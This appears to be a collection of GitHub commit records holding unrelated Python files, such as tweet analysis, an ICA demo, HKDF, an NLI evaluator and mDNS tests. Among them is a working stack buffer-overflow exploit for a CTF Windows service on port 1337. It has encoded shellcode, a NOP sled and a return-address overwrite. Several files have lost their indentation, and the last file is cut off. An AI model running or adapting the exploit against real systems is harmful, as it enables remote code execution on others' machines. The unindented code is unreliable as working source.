CONTINUE: "Continue",
SWITCHING: "Switching Protocols",
# 200
OK: "OK",
CREATED: "Created",
ACCEPTED: "Accepted",
NON_AUTHORITATIVE_INFORMATION: "Non-Authoritative Information",
NO_CONTENT: "No Content",
RESET_CONTENT: "Reset Content.",
PARTIAL_CONTENT: "Partial Content",
MULTI_STATUS: "Multi-Status",
# 300
MULTIPLE_CHOICE: "Multiple Choices",
MOVED_PERMANENTLY: "Moved Permanently",
FOUND: "Found",
SEE_OTHER: "See Other",
NOT_MODIFIED: "Not Modified",
USE_PROXY: "Use Proxy",
# 306 not defined??
TEMPORARY_REDIRECT: "Temporary Redirect",
# 400
BAD_REQUEST: "Bad Request",
UNAUTHORIZED: "Unauthorized",
PAYMENT_REQUIRED: "Payment Required",
FORBIDDEN: "Forbidden",
NOT_FOUND: "Not Found",
NOT_ALLOWED: "Method Not Allowed",
NOT_ACCEPTABLE: "Not Acceptable",
PROXY_AUTH_REQUIRED: "Proxy Authentication Required",
REQUEST_TIMEOUT: "Request Time-out",
CONFLICT: "Conflict",
GONE: "Gone",
LENGTH_REQUIRED: "Length Required",
PRECONDITION_FAILED: "Precondition Failed",
REQUEST_ENTITY_TOO_LARGE: "Request Entity Too Large",
REQUEST_URI_TOO_LONG: "Request-URI Too Long",
UNSUPPORTED_MEDIA_TYPE: "Unsupported Media Type",
REQUESTED_RANGE_NOT_SATISFIABLE: "Requested Range not satisfiable",
EXPECTATION_FAILED: "Expectation Failed",
# 500
INTERNAL_SERVER_ERROR: "Internal Server Error",
NOT_IMPLEMENTED: "Not Implemented",
BAD_GATEWAY: "Bad Gateway",
SERVICE_UNAVAILABLE: "Service Unavailable",
GATEWAY_TIMEOUT: "Gateway Time-out",
HTTP_VERSION_NOT_SUPPORTED: "HTTP Version not supported",
INSUFFICIENT_STORAGE_SPACE: "Insufficient Storage Space",
NOT_EXTENDED: "Not Extended"
}
| mit | Python |
|
e7a2ec9b38b69a852667cca8d5c7da3ff242ce61 | Add processTweets.py | traxex33/Twitter-Analysis | processTweets.py | processTweets.py | import json
import re
import operator
import string
import collections
from collections import Counter
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
#Setup regex to ingore emoticons
emoticons_str = r"""
(?:
[:=;] Eyes
[oO\-]? # Nose (optional)
[D\)\]\(\]/\\OpP] # Mouth
)"""
#Setup regex to split mentions, hashtags, urls, etc. together
regex_str = [
emoticons_str,
r'<[^>]+>', #HTML tags
r'(?:@[\w_]+)', #@-mentions
r"(?:\#+[\w_]+[\w\'_\-]*[\w_]+)", #hashtags
r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs
r'(?:(?:\d+,?)+(?:\.?\d+)?)', #numbers
r"(?:[a-z][a-z'\-_]+[a-z])", #words with - and '
r'(?:[\w_]+)', #other words
r'(?:\S)' #anything else
]
tokens_re = re.compile(r'('+'|'.join(regex_str)+')', re.VERBOSE | re.IGNORECASE)
emoticon_re = re.compile(r'^'+emoticons_str+'$', re.VERBOSE | re.IGNORECASE)
def tokenize(s):
return tokens_re.findall(s)
def preprocess(s, lowercase=False):
tokens = tokenize(s)
if lowercase:
tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]
    # rebinding the loop variable is a no-op; build a new encoded list instead
    tokens = [token.encode('utf-8') for token in tokens]
return tokens
punctuation = list(string.punctuation)
others = ['RT', 'via', u'\u2026', 'The', u'\u2019', 'amp']
stop = stopwords.words('english') + punctuation + others
#Find most common words
def terms_only(fname, number):
with open(fname, 'r') as f:
count_all = Counter()
for line in f:
tweet = json.loads(line)
terms_stop = [term for term in preprocess(tweet['text'])
if term not in stop and not term.startswith(('#', '@'))]
count_all.update(terms_stop)
print(count_all.most_common(number))
#Find most common hashtags
def hash_only(fname, number):
with open(fname, 'r') as f:
count_all = Counter()
for line in f:
tweet = json.loads(line)
terms_hash = [term for term in preprocess(tweet['text'])
if term not in stop if term.startswith('#')]
count_all.update(terms_hash)
print(count_all.most_common(number))
#Find most common mentions
def mentions_only(fname, number):
with open(fname, 'r') as f:
count_all = Counter()
for line in f:
tweet = json.loads(line)
terms_mentions = [term for term in preprocess(tweet['text'])
if term not in stop if term.startswith('@')]
count_all.update(terms_mentions)
print(count_all.most_common(number))
#Find most common two-term occurances
def cooccurances(fname, number):
with open(fname, 'r') as f:
com = collections.defaultdict(lambda: collections.defaultdict(int))
for line in f:
tweet = json.loads(line)
terms_only = [term for term in preprocess(tweet['text'])
if term not in stop and not term.startswith(('#', '@'))]
for i in range(len(terms_only)):
for j in range(i+1, len(terms_only)):
w1, w2 = sorted([terms_only[i], terms_only[j]])
if w1 != w2:
com[w1][w2] += 1
com_max = []
for t1 in com:
t1_max_terms = sorted(com[t1].items(), key=operator.itemgetter(1), reverse=True)[:number]
for t2, t2_count in t1_max_terms:
com_max.append(((t1, t2), t2_count))
terms_max = sorted(com_max, key=operator.itemgetter(1), reverse=True)
print(terms_max[:number])
#Main Function Begins
if __name__ == "__main__":
fname = "tweets.json"
number = 10
print "Terms only"
terms_only(fname, number)
print "\nHashtags only"
hash_only(fname, number)
print "\nMentions only"
mentions_only(fname, number)
print "\nCooccurances"
cooccurances(fname, number)
| mit | Python |
|
e39bce6ba02ad4ed3c20768c234606afb48ac86a | Solve Largest Product | rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank | python/euler008.py | python/euler008.py | #!/bin/python3
import sys
from functools import reduce
class LargestProduct:
def __init__(self, num, num_consecutive_digits):
self.num = num
self.num_consecutive_digits = num_consecutive_digits
def largest_product(self):
return max(map(LargestProduct.product, LargestProduct.slices(LargestProduct.digits(self.num), self.num_consecutive_digits)))
@staticmethod
def slices(array, slice_length):
        return [array[i:i + slice_length] for i in range(len(array) - slice_length + 1)]  # + 1 so the final window is included
@staticmethod
def digits(num):
return [int(x) for x in str(num)]
@staticmethod
def product(array):
return reduce((lambda x, y: x * y), array)
t = int(input().strip())
for a0 in range(t):
_, num_consecutive_digits = map(int, input().strip().split(' '))
num = input().strip()
lp = LargestProduct(num, num_consecutive_digits)
print (lp.largest_product())
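# Sample run (HackerRank-style input; hypothetical case, expected output shown):
#   stdin:  1
#           10 5
#           3675356291
#   stdout: 3150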
| mit | Python |
|
8c14684667b48921987f833f41727d036a3fe9f7 | Add SICK evaluation script in python | kovvalsky/LangPro,kovvalsky/LangPro,kovvalsky/LangPro,kovvalsky/LangPro | python/evaluate.py | python/evaluate.py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import argparse
import re
from collections import Counter
#################################
def parse_arguments():
parser = argparse.ArgumentParser(description="Evaluate predictions against gold labels.")
parser.add_argument(
'sys', metavar='FILE', help='File with problem ID, white space and label per line')
parser.add_argument(
'gld', metavar='FILE', help="File with gold label. The format might vary")
# meta parameters
parser.add_argument(
'-v', '--verbose', dest='v', default=0, type=int, metavar='N', help='verbosity level of reporting')
args = parser.parse_args()
return args
#################################
def read_id_labels(filepath, pattern="(\d+)\s+(NEUTRAL|CONTRADICTION|ENTAILMENT)"):
'''Read a list of (ID, label) pairs from the file'''
id_labels = dict()
with open(filepath) as f:
for line in f:
m = re.search(pattern, line)
if m: id_labels[m.group(1)] = m.group(2)
return id_labels
#################################
def draw_conf_matrix(counter, labs=['ENTAILMENT', 'CONTRADICTION', 'NEUTRAL']):
'''Draw a confusion matrix for labels from two sources'''
print(f"{63*'-'}\n{'':15} {labs[0]:>15} {labs[1]:>15} {labs[2]:>15}\n{63*'-'}")
for gld in labs:
print(f"{gld:>15}", end=' ')
for sys in labs:
print(f"{counter[(sys, gld)]:>15}", end=' ')
print()
print(63*'-')
#################################
def calc_measures(counter, labs=['ENTAILMENT', 'CONTRADICTION', 'NEUTRAL']):
'''Calculate various measures'''
m = dict()
diag = sum([ counter[(l,l)] for l in labs ])
total = sum(counter.values())
m['accuracy'] = 100.0*diag / total
# precision and recall as C & E positives
diagEC = sum([ counter[(l,l)] for l in labs[:2] ])
sys_neut = sum([ counter[(labs[2],l)] for l in labs ])
gld_neut = sum([ counter[(l,labs[2])] for l in labs ])
m['precision'] = 100.0*diagEC / (total - sys_neut)
m['recall'] = 100.0*diagEC / (total - gld_neut)
return m
#################################
if __name__ == '__main__':
args = parse_arguments()
sys_ans = read_id_labels(args.sys)
gld_ans = read_id_labels(args.gld, pattern="^(\d+)\s+.+(NEUTRAL|CONTRADICTION|ENTAILMENT)$")
assert len(sys_ans) == len(gld_ans),\
f"The sources contain different number of problems ({len(sys_ans)} vs {len(gld_ans)})"
lab_pairs = [ (sys_ans[k], gld_ans[k]) for k in sys_ans ]
counter = Counter(lab_pairs)
draw_conf_matrix(counter)
m = calc_measures(counter)
for name in sorted(m.keys()):
print(f"{name:<12}: {m[name]:4.2f}%")
| bsd-3-clause | Python |
|
cd239be7ec84ccb000992841700effeb4bc6a508 | Add quickstart fabfile.py | petchat/streamparse,petchat/streamparse,msmakhlouf/streamparse,Parsely/streamparse,scrapinghub/streamparse,eric7j/streamparse,codywilbourn/streamparse,Parsely/streamparse,petchat/streamparse,hodgesds/streamparse,eric7j/streamparse,crohling/streamparse,msmakhlouf/streamparse,petchat/streamparse,hodgesds/streamparse,msmakhlouf/streamparse,crohling/streamparse,scrapinghub/streamparse,scrapinghub/streamparse,phanib4u/streamparse,scrapinghub/streamparse,msmakhlouf/streamparse,codywilbourn/streamparse,petchat/streamparse,scrapinghub/streamparse,phanib4u/streamparse,msmakhlouf/streamparse | streamparse/bootstrap/project/fabfile.py | streamparse/bootstrap/project/fabfile.py | """fab env:prod deploy:wordcount"""
import json
from fabric.api import run, put, env as _env
from fabric.decorators import task
@task
def env(e=None):
"""Activate a particular environment from the config.json file."""
with open('config.json', 'r') as fp:
config = json.load(fp)
_env.hosts = config['envs'][e]['hosts']
@task
def deploy(topology=None):
"""Deploy a topology to a remote host. Deploying a streamparse topology
    accomplishes four things:
1. Create an uberjar which contains all code.
2. Push the topology virtualenv requirements to remote.
3. Update virtualenv on host server.
4. Submit topology (in uberjar) to remote Storm cluster."""
pass
| apache-2.0 | Python |
|
7f7fbb94796134301ee5289fa447e8632f59c912 | Create sec660_ctf_windows300.py | timip/exploit | sec660_ctf_windows300.py | sec660_ctf_windows300.py | #!/usr/bin/python
import socket
import sys
import time
buf = ""
buf += "\xd9\xc5\xba\x43\xdc\xd1\x08\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\x15\xcf\x33"
buf += "\xfd\x65\x07\x31\xfe\x95\xd8\x56\x76\x70\xe9\x56\xec"
buf += "\xf1\x5a\x67\x66\x57\x57\x0c\x2a\x43\xec\x60\xe3\x64"
buf += "\x45\xce\xd5\x4b\x56\x63\x25\xca\xd4\x7e\x7a\x2c\xe4"
buf += "\xb0\x8f\x2d\x21\xac\x62\x7f\xfa\xba\xd1\x6f\x8f\xf7"
buf += "\xe9\x04\xc3\x16\x6a\xf9\x94\x19\x5b\xac\xaf\x43\x7b"
buf += "\x4f\x63\xf8\x32\x57\x60\xc5\x8d\xec\x52\xb1\x0f\x24"
buf += "\xab\x3a\xa3\x09\x03\xc9\xbd\x4e\xa4\x32\xc8\xa6\xd6"
buf += "\xcf\xcb\x7d\xa4\x0b\x59\x65\x0e\xdf\xf9\x41\xae\x0c"
buf += "\x9f\x02\xbc\xf9\xeb\x4c\xa1\xfc\x38\xe7\xdd\x75\xbf"
buf += "\x27\x54\xcd\xe4\xe3\x3c\x95\x85\xb2\x98\x78\xb9\xa4"
buf += "\x42\x24\x1f\xaf\x6f\x31\x12\xf2\xe7\xf6\x1f\x0c\xf8"
buf += "\x90\x28\x7f\xca\x3f\x83\x17\x66\xb7\x0d\xe0\x89\xe2"
buf += "\xea\x7e\x74\x0d\x0b\x57\xb3\x59\x5b\xcf\x12\xe2\x30"
buf += "\x0f\x9a\x37\xac\x07\x3d\xe8\xd3\xea\xfd\x58\x54\x44"
buf += "\x96\xb2\x5b\xbb\x86\xbc\xb1\xd4\x2f\x41\x3a\xcb\xf3"
buf += "\xcc\xdc\x81\x1b\x99\x77\x3d\xde\xfe\x4f\xda\x21\xd5"
buf += "\xe7\x4c\x69\x3f\x3f\x73\x6a\x15\x17\xe3\xe1\x7a\xa3"
buf += "\x12\xf6\x56\x83\x43\x61\x2c\x42\x26\x13\x31\x4f\xd0"
buf += "\xb0\xa0\x14\x20\xbe\xd8\x82\x77\x97\x2f\xdb\x1d\x05"
buf += "\x09\x75\x03\xd4\xcf\xbe\x87\x03\x2c\x40\x06\xc1\x08"
buf += "\x66\x18\x1f\x90\x22\x4c\xcf\xc7\xfc\x3a\xa9\xb1\x4e"
buf += "\x94\x63\x6d\x19\x70\xf5\x5d\x9a\x06\xfa\x8b\x6c\xe6"
buf += "\x4b\x62\x29\x19\x63\xe2\xbd\x62\x99\x92\x42\xb9\x19"
buf += "\xa2\x08\xe3\x08\x2b\xd5\x76\x09\x36\xe6\xad\x4e\x4f"
buf += "\x65\x47\x2f\xb4\x75\x22\x2a\xf0\x31\xdf\x46\x69\xd4"
buf += "\xdf\xf5\x8a\xfd"
buf1 = "B" * 10
buf2 = "\x90" * 100 + buf + "A" * (1932 - 100 - len(buf)) + "\xca\x12\x40\00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((sys.argv[1], 1337))
s.send(buf1 + '\r\n')
print s.recv(1024)
#time.sleep(30)
raw_input('Press enter to continue')
s.send(buf2 + '\r\n')
print s.recv(1024)
s.close()
| apache-2.0 | Python |
|
348b10962f12e1c49ed5c4caf06a838b89b1e5af | Create plasma.py | icfaust/TRIPPy,icfaust/TRIPPy | plasma.py | plasma.py | import geometry
| mit | Python |
|
bd05625c2e0a164f0b720c8c13fb06540d4fcdb9 | Create ica_demo.py (#496) | probml/pyprobml,probml/pyprobml,probml/pyprobml,probml/pyprobml | scripts/ica_demo.py | scripts/ica_demo.py | # Blind source separation using FastICA and PCA
# Author : Aleyna Kara
# This file is based on https://github.com/probml/pmtk3/blob/master/demos/icaDemo.m
from sklearn.decomposition import PCA, FastICA
import numpy as np
import matplotlib.pyplot as plt
import pyprobml_utils as pml
def plot_signals(signals, suptitle, file_name):
plt.figure(figsize=(8, 4))
for i, signal in enumerate(signals, 1):
plt.subplot(n_signals, 1, i)
plt.plot(signal)
plt.xlim([0, N])
plt.tight_layout()
plt.suptitle(suptitle)
plt.subplots_adjust(top=0.85)
pml.savefig(f'{file_name}.pdf')
plt.show()
# https://github.com/davidkun/FastICA/blob/master/demosig.m
def generate_signals():
    v = np.arange(0, N)  # use the module-level signal length N (= 500)
signals = np.zeros((n_signals, N))
signals[0, :] = np.sin(v/2) # sinusoid
signals[1, :] = ((v % 23 - 11) / 9)**5
signals[2, :] = ((v % 27 - 13)/ 9) # sawtooth
rand = np.random.rand(1, N)
signals[3, :] = np.where(rand < 0.5, rand * 2 -1, -1) * np.log(np.random.rand(1, N)) #impulsive noise
signals /= signals.std(axis=1).reshape((-1,1))
signals -= signals.mean(axis=1).reshape((-1,1))
A = np.random.rand(n_signals, n_signals) # mixing matrix
return signals, A @ signals
np.random.seed(0)
n_signals, N = 4, 500
signals, mixed_signals = generate_signals()
plot_signals(signals, 'Truth', 'ica-truth')
plot_signals(mixed_signals, 'Observed Signals', 'ica-obs')
pca = PCA(whiten=True, n_components=4)
signals_pca = pca.fit(mixed_signals.T).transform(mixed_signals.T)
ica = FastICA(algorithm='deflation', n_components=4)
signals_ica = ica.fit_transform(mixed_signals.T)
plot_signals(signals_pca.T, 'PCA estimate','ica-pca')
plot_signals(signals_ica.T, 'ICA estimate', 'ica-ica') | mit | Python |
|
a8add82f2f9092d07f9ef40420c4b303700c912d | add a 'uniq' function | StoDevX/cs251-toolkit,StoDevX/cs251-toolkit,StoDevX/cs251-toolkit,StoDevX/cs251-toolkit | lib/uniq.py | lib/uniq.py | # from http://www.peterbe.com/plog/uniqifiers-benchmark
def identity(x):
return x
def uniq(seq, idfun=identity):
# order preserving
seen = {}
result = []
for item in seq:
marker = idfun(item)
if marker in seen:
continue
seen[marker] = True
result.append(item)
return result
| mit | Python |
|
c57c672aae98fb5b280f70b68ac27fc2d94a243f | Add test class to cover the RandomForestClassifier in Go | nok/sklearn-porter | tests/estimator/classifier/RandomForestClassifier/RandomForestClassifierGoTest.py | tests/estimator/classifier/RandomForestClassifier/RandomForestClassifierGoTest.py | # -*- coding: utf-8 -*-
from unittest import TestCase
from sklearn.ensemble import RandomForestClassifier
from tests.estimator.classifier.Classifier import Classifier
from tests.language.Go import Go
class RandomForestClassifierGoTest(Go, Classifier, TestCase):
def setUp(self):
super(RandomForestClassifierGoTest, self).setUp()
self.estimator = RandomForestClassifier(n_estimators=100,
random_state=0)
def tearDown(self):
super(RandomForestClassifierGoTest, self).tearDown()
| bsd-3-clause | Python |
|
e045a7bd1c3d791de40412bafa62702bee59132e | Add Python solution for day 15. | Mark-Simulacrum/advent-of-code-2015,Mark-Simulacrum/advent-of-code-2015,Mark-Simulacrum/advent-of-code-2015,Mark-Simulacrum/advent-of-code-2015 | day15/solution.py | day15/solution.py |
data = open("data", "r").read()
ingredients = []
for line in data.split("\n"):
name = line.split(": ")[0]
properties = line.split(": ")[1].split(", ")
props = { 'value': 0 }
for prop in properties:
props[prop.split(" ")[0]] = int(prop.split(" ")[1])
ingredients.append(props)
def getPropertyScore(property, ingredients):
value = 0
for ingredient in ingredients:
value += ingredient[property] * ingredient['value']
if value <= 0:
return 0
else:
return value
def calculateScore(ingredients):
score = getPropertyScore("capacity", ingredients)
score *= getPropertyScore("durability", ingredients)
score *= getPropertyScore("flavor", ingredients)
score *= getPropertyScore("texture", ingredients)
calories = getPropertyScore("calories", ingredients)
return score, calories
def addValue(ingredient, value):
ingredient['value'] = value
return ingredient
maxScore = -100
optionsTried = 0
for i in xrange(1, 100):
for j in xrange(1, 100 - i):
for k in xrange(1, 100 - i - j):
h = 100 - i - j - k
scoreInput = [
addValue(ingredients[0], i),
addValue(ingredients[1], j),
addValue(ingredients[2], k),
addValue(ingredients[3], h)
]
score, calories = calculateScore(scoreInput)
if calories == 500 and maxScore < score:
maxScore = score
optionsTried += 1
print "maxScore:", maxScore
print "optionsTried:", optionsTried
| mit | Python |
|
df68e5aa8ab620f03c668ae886ed8a1beef3c697 | Add HKDF-SHA256 implementation. | isislovecruft/scramblesuit,isislovecruft/scramblesuit | hkdf-sha256.py | hkdf-sha256.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
import obfsproxy.transports.base as base
import math
class HKDF_SHA256( object ):
"""
Implements HKDF using SHA256: https://tools.ietf.org/html/rfc5869
This class only implements the `expand' but not the `extract' stage.
"""
def __init__( self, prk, info="", length=32 ):
self.HashLen = 32
if length > (self.HashLen * 255):
raise ValueError("The OKM's length cannot be larger than %d." % \
(self.HashLen * 255))
if len(prk) < self.HashLen:
raise ValueError("The PRK must be at least %d bytes in length." % \
self.HashLen)
self.N = math.ceil(float(length) / self.HashLen)
self.prk = prk
self.info = info
self.length = length
self.ctr = 1
self.T = ""
def expand( self ):
"""Expands, based on PRK, info and L, the given input material to the
output key material."""
tmp = ""
# Prevent the accidental re-use of output keying material.
if len(self.T) > 0:
raise base.PluggableTransportError("HKDF-SHA256 OKM must not " \
"be re-used by application.")
while self.length > len(self.T):
tmp = HMAC.new(self.prk, tmp + self.info + chr(self.ctr),
SHA256).digest()
self.T += tmp
self.ctr += 1
return self.T[:self.length]
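# Usage sketch (illustrative; the PRK must already come from an extract step,
# e.g. HMAC-SHA256 over the input keying material and a salt):
#   okm = HKDF_SHA256(prk, info="some context", length=64).expand()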
| bsd-3-clause | Python |
|
7cf5f0a4e2b7c8e83f26ea3f9170c5ee0e7bbdbb | make it easier to compare/validate models | et-al-Health/parserator,yl2695/parserator,datamade/parserator | parserator/spotcheck.py | parserator/spotcheck.py | import pycrfsuite
def compareTaggers(model1, model2, string_list, module_name):
"""
Compare two models. Given a list of strings, prints out tokens & tags
whenever the two taggers parse a string differently. This is for spot-checking models
:param tagger1: a .crfsuite filename
:param tagger2: another .crfsuite filename
:param string_list: a list of strings to be checked
:param module_name: name of a parser module
"""
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
count_discrepancies = 0
for string in string_list:
tokens = module.tokenize(string)
if tokens:
features = module.tokens2features(tokens)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if tags1 != tags2:
count_discrepancies += 1
print '\n'
print "%s. %s" %(count_discrepancies, string)
print '-'*75
print_spaced('token', model1, model2)
print '-'*75
for token in zip(tokens, tags1, tags2):
print_spaced(token[0], token[1], token[2])
print "\n\n%s of %s strings were labeled differently"%(count_discrepancies, len(string_list))
def print_spaced(s1, s2, s3):
n = 25
print s1 + " "*(n-len(s1)) + s2 + " "*(n-len(s2)) + s3
def validateTaggers(model1, model2, labeled_string_list, module_name):
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
wrong_count_1 = 0
wrong_count_2 = 0
wrong_count_both = 0
correct_count = 0
for labeled_string in labeled_string_list:
unlabeled_string, components = labeled_string
tokens = module.tokenize(unlabeled_string)
if tokens:
features = module.tokens2features(tokens)
_, tags_true = zip(*components)
tags_true = list(tags_true)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if (tags1 != tags_true) and (tags2 != tags_true):
print "\nSTRING: ", unlabeled_string
print "TRUE: ", tags_true
print "*%s: "%model1, tags1
print "*%s: "%model2, tags2
wrong_count_both += 1
elif (tags1 != tags_true):
print "\nSTRING: ", unlabeled_string
print "TRUE: ", tags_true
print "*%s: "%model1, tags1
print "%s: "%model2, tags2
wrong_count_1 += 1
elif (tags2 != tags_true):
print "\nSTRING: ", unlabeled_string
print "TRUE: ", tags_true
print "%s: "%model1, tags1
print "*%s: "%model2, tags2
wrong_count_2 += 1
else:
correct_count += 1
print "\n\nBOTH WRONG: ", wrong_count_both
print "%s WRONG: %s" %(model1, wrong_count_1)
print "%s WRONG: %s" %(model2, wrong_count_2)
print "BOTH CORRECT: ", correct_count
| mit | Python |
|
d4adf3e0e177e80ce7bc825f1cb4e461e5551b2f | Add basic configuration support to oonib | juga0/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,lordappsec/ooni-probe,kdmurray91/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,juga0/ooni-probe,0xPoly/ooni-probe,0xPoly/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,Karthikeyan-kkk/ooni-probe,0xPoly/ooni-probe,juga0/ooni-probe,juga0/ooni-probe,kdmurray91/ooni-probe,lordappsec/ooni-probe,lordappsec/ooni-probe,Karthikeyan-kkk/ooni-probe | oonib/config.py | oonib/config.py | from ooni.utils import Storage
import os
# XXX convert this to something that is a proper config file
main = Storage()
main.reporting_port = 8888
main.http_port = 8080
main.dns_udp_port = 5354
main.dns_tcp_port = 8002
main.daphn3_port = 9666
main.server_version = "Apache"
#main.ssl_private_key = /path/to/data/private.key
#main.ssl_certificate = /path/to/data/certificate.crt
#main.ssl_port = 8433
helpers = Storage()
helpers.http_return_request_port = 1234
daphn3 = Storage()
daphn3.yaml_file = "/path/to/data/oonib/daphn3.yaml"
daphn3.pcap_file = "/path/to/data/server.pcap"
| bsd-2-clause | Python |
|
58f05fe7736ce387bb8086128bc9de32b8cd6a59 | Add simplify.py | indico/indico-plugins,ThiefMaster/indico-plugins,ThiefMaster/indico-plugins,indico/indico-plugins,indico/indico-plugins,ThiefMaster/indico-plugins,ThiefMaster/indico-plugins,indico/indico-plugins | livesync/indico_livesync/simplify.py | livesync/indico_livesync/simplify.py | # This file is part of Indico.
# Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from indico_livesync.models.queue import ChangeType
def process_records(records):
changes = {}
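    # Collapse the queue into a single effective change per object.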
for record in records:
if record.type != ChangeType.deleted and record.object is None:
continue
        if record.type == ChangeType.created:
            changes[record.object] = record.type
        elif record.type == ChangeType.deleted:
            changes[record.object] = record.type
        elif record.type in {ChangeType.moved, ChangeType.protection_changed}:
            changes.update(_cascade_change(record))
        elif record.type == ChangeType.title_changed:
            pass
        elif record.type == ChangeType.data_changed and not record.category_id:
            changes[record.object] = record.type
    for obj, state in changes.iteritems():
        pass
def _cascade_change(record):
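    # Apply the record's change to the object itself and to all of its sub-records.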
    changes = {record.object: record.type}
for subrecord in record.subrecords():
changes.update(_cascade_change(subrecord))
return changes
| mit | Python |
|
6a65d102bfcd667c382704ea3430d76faaa1b3d1 | Add tests | looplab/salut | tests/test_salut.py | tests/test_salut.py | import unittest
from mock import MagicMock
import socket
import gevent
import gevent.socket
from otis.common.salut import Announcer, Browser
class TestSalut(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_announce(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
announcer.stop()
def test_announce_registered_callback(self):
callback = MagicMock()
announcer = Announcer(
'Test', '_otis_test._tcp', 9999, callback.registered)
while not announcer.announced:
gevent.sleep(0.05)
callback.registered.assert_called_once_with(
'local.', '_otis_test._tcp.', 'Test')
announcer.stop()
def test_browse(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
browser = Browser(
'Test', '_otis_test._tcp')
while not browser.resolved:
gevent.sleep(0.05)
browser.stop()
announcer.stop()
def test_browse_resolved_callback(self):
ip = gevent.socket.gethostbyname(socket.gethostname())
port = 9999
announcer = Announcer('Test', '_otis_test._tcp', port)
while not announcer.announced:
gevent.sleep(0.05)
callback = MagicMock()
browser = Browser(
'Test', '_otis_test._tcp',
resolved_callback=callback.resolved)
while not browser.resolved:
gevent.sleep(0.05)
callback.resolved.assert_called_once_with(ip, port)
browser.stop()
announcer.stop()
def test_browse_unresolved_callback(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
callback = MagicMock()
browser = Browser(
'Test', '_otis_test._tcp',
unresolved_callback=callback.unresolved)
while not browser.resolved:
gevent.sleep(0.05)
announcer.stop()
while announcer.announced:
gevent.sleep(0.05)
announcer = None
while browser.resolved:
gevent.sleep(0.05)
callback.unresolved.assert_called_once()
browser.stop()
def test_unresolve_resolve(self):
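        # The service should disappear when its announcer stops and be found again after re-announcing.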
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
browser = Browser('Test', '_otis_test._tcp')
while not browser.resolved:
gevent.sleep(0.05)
announcer.stop()
while announcer.announced:
gevent.sleep(0.05)
announcer = None
while browser.resolved:
gevent.sleep(0.05)
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
while not browser.resolved:
gevent.sleep(0.05)
browser.stop()
| apache-2.0 | Python |
|
f65a6c12dd615d235a306b130ebd63358429e8c6 | Create boss.py | PixelIndigo/ctfsolutions | boss.py | boss.py | # -*- coding: utf-8 -*-
import urllib
import urllib2
import re
from cookielib import CookieJar
reg = re.compile(r'href="\.\/in[^"\\]*(?:\\.[^"\\]*)*"')
stager = re.compile(r'>.+100.')
answers = {1: '/index.php?answer=42', 2: '/index.php?answer=bt'}
wrong = set()
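# Links that failed to advance the stage; they are never followed twice.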
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
response = opener.open("http://maze.qctf.ru/index.php")
content = response.read()
stage = int(stager.findall(content)[0][1:-6])
chosen = answers[1]
response = opener.open("http://maze.qctf.ru"+answers[1])
prev_stage = 1
while True:
content = response.read()
stage = int(stager.findall(content)[0][1:-6])
if stage == prev_stage+1:
if stage > len(answers):
print content
print "Stage "+str(stage)
print "Success "+str(stage-1)+" with "+chosen
answers[stage-1] = chosen
else:
wrong.add(chosen)
if len(answers) < stage:
v = [x[7:-1] for x in reg.findall(content)]
for x in v:
if x not in wrong:
chosen = x
break
response = opener.open("http://maze.qctf.ru"+chosen)
else:
chosen = answers[stage]
response = opener.open("http://maze.qctf.ru"+answers[stage])
prev_stage = stage
| unlicense | Python |
|
df7235e13c14f13dd27ede6c098a9b5b80b4b297 | Add test_functions | juliakreutzer/bandit-neuralmonkey,bastings/neuralmonkey,ufal/neuralmonkey,ufal/neuralmonkey,ufal/neuralmonkey,juliakreutzer/bandit-neuralmonkey,juliakreutzer/bandit-neuralmonkey,juliakreutzer/bandit-neuralmonkey,ufal/neuralmonkey,ufal/neuralmonkey,bastings/neuralmonkey,bastings/neuralmonkey,juliakreutzer/bandit-neuralmonkey,bastings/neuralmonkey,bastings/neuralmonkey | neuralmonkey/tests/test_functions.py | neuralmonkey/tests/test_functions.py | #!/usr/bin/env python3
"""Unit tests for functions.py."""
# tests: mypy, lint
import unittest
import tensorflow as tf
from neuralmonkey.functions import piecewise_function
class TestPiecewiseFunction(unittest.TestCase):
def test_piecewise_constant(self):
x = tf.placeholder(dtype=tf.int32)
